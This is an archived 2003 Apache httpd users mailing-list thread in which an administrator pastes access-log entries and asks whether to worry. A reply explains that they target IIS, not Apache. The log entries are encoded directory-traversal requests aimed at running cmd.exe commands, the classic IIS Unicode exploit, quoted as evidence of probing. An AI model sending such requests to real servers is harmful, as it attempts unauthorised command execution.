You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Patrick O'Neal <pa...@oneal.net> on 2003/12/05 20:01:22 UTC
Re: [users@httpd] error messeges in my log
To all:
I am running Apache 2.0.47 on RH9 I have been getting these error
messages in my log for quite some time but I haven't been too concerned
about it because they seem to have to do with MSIIS vulnerabilities but
is that actually true, with the new found attacks on the gentoo.org and
gnu.org servers lately I am re-investigating this to see if it needs
addressing. Have any of you found this problem as well, and if so what
did you do if anything to make it stop?
I have included a paste of my log to show you what I am talking about.
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 945
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 945
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
68.55.245.17 - - [05/Dec/2003:12:13:31 -0600] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
I know that the users just get a 404 error but is that all?
--
Patrick O'Neal
IT GURU
Email: patrick@oneal.net
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] error messeges in my log
Posted by Joshua Slive <jo...@slive.ca>.
On Fri, 5 Dec 2003, Patrick O'Neal wrote:
> I am running Apache 2.0.47 on RH9 I have been getting these error
> messages in my log for quite some time but I haven't been too concerned
> about it because they seem to have to do with MSIIS vulnerabilities but
> is that actually true, with the new found attacks on the gentoo.org and
> gnu.org servers lately I am re-investigating this to see if it needs
> addressing. Have any of you found this problem as well, and if so what
> did you do if anything to make it stop?
>
> I have included a paste of my log to show you what I am talking about.
>
> 68.55.245.17 - - [05/Dec/2003:12:13:30 -0600] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
None of the recent attacks were on HTTP server software. From what I've
read, they were through a sniffed password, a hole in rsyncd, and a linux
kernel flaw.
This doesn't mean, of course, that flaws in apache are not possible. But
your log clearly shows an IIS attack, so there is no need to worry.
Joshua.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org